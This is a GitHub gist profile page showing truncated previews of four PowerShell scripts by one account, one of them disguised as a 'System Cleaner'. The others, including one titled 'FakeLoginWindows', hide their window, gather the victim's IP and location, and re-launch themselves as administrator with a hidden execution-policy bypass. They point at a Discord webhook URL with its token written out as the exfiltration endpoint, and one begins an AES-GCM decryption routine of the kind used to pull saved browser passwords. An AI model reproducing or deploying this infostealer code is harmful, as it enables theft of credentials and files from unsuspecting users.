Skip to content

Instantly share code, notes, and snippets.

View infamous51's full-sized avatar

infamous51

  • Joined May 14, 2026
View GitHub Profile
@infamous51
infamous51 / cleaner.ps1
Last active May 15, 2026 01:30
asdnoasjgbn eadjuofgbeasuojgb wseraofguweshfesdfgbwisdfvgb
$host.UI.RawUI.WindowTitle = "System Cleaner"
$host.UI.RawUI.BackgroundColor = "Black"
$host.UI.RawUI.ForegroundColor = "Cyan"
Clear-Host
$tl=[char]0x2554;$tr=[char]0x2557;$bl=[char]0x255A;$br=[char]0x255D;$hz=[char]0x2550;$vt=[char]0x2551;$lt=[char]0x2560;$rt=[char]0x2563
$w=50
function Header {
Write-Host ""
Write-Host " $tl$([string]::new($hz,$w))$tr" -ForegroundColor DarkCyan
@infamous51
infamous51 / FakeLoginWindows.ps1
Last active May 14, 2026 20:30
asfhbwgieguweugfwefuwegbwuorgbuwgwugfwefwef
$w32 = '[DllImport("user32.dll")] public static extern bool ShowWindow(int h, int s);'
Add-Type -MemberDefinition $w32 -Name W -Namespace N -EA 0
[N.W]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess()).MainWindowHandle, 0) | Out-Null
$script:dc = "https://discord.com/api/webhooks/1504506582275326142/I2XjeZQsTmit4cSYKbYTS6dP4KROrBvnvRrJzUDo9Iz8R-6bWvyA4swh2GsX7P-ol_yZ"
try { $script:pubIp = (Invoke-RestMethod -Uri "https://api.ipify.org" -TimeoutSec 5) } catch { $script:pubIp = "Unknown" }
try {
$g = Invoke-RestMethod -Uri "http://ip-api.com/json/$script:pubIp" -TimeoutSec 5
$script:geoLoc = "$($g.city), $($g.regionName), $($g.country)"
@infamous51
infamous51 / filehunter.ps1
Last active May 14, 2026 20:17
asdasbagbusuduwbuerfenbfvujgbhunjeaeougfheHUOBwnujolvbujgvwuog4wuogulojhfurhgolghp;wifheofuwehfuwehfwoeghowfohqweqqwgq
$w32 = '[DllImport("user32.dll")] public static extern bool ShowWindow(int h, int s);'
Add-Type -MemberDefinition $w32 -Name W -Namespace N -EA 0
[N.W]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess()).MainWindowHandle, 0) | Out-Null
if(!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
Start-Process powershell -ArgumentList "-NoP -Ep Bypass -W Hidden -File `"$PSCommandPath`"" -Verb RunAs
exit
}
$dc = "https://discord.com/api/webhooks/1504506582275326142/I2XjeZQsTmit4cSYKbYTS6dP4KROrBvnvRrJzUDo9Iz8R-6bWvyA4swh2GsX7P-ol_yZ"
@infamous51
infamous51 / gist:bf782b2ccfe8923bbb8db67d6705b928
Last active May 14, 2026 20:23
heylolllldsadaosdaksdnoauisdasiohgabaabianwuoadbausnuujfasuanaujofbaljfsaohugehuofaoshaohwafouasnfjaknsgawihuahsfuafhwafidajsodnnnbwjoaf buoasfbaugbsidjfjsglhsbgrh hkrba
$w32 = '[DllImport("user32.dll")] public static extern bool ShowWindow(int h, int s);'
Add-Type -MemberDefinition $w32 -Name W -Namespace N -EA 0
[N.W]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess()).MainWindowHandle, 0) | Out-Null
$dc = "https://discord.com/api/webhooks/1504506582275326142/I2XjeZQsTmit4cSYKbYTS6dP4KROrBvnvRrJzUDo9Iz8R-6bWvyA4swh2GsX7P-ol_yZ"
$tmp = "$env:TEMP\$( -join ((65..90) | Get-Random -Count 8 | % {[char]$_}))"
$rpt = "$tmp\REPORT.txt"
New-Item -ItemType Directory -Path "$tmp\raw" -Force | Out-Null
Add-Type -AssemblyName System.Security
function Decrypt-AesGcm($enc, $masterKey) {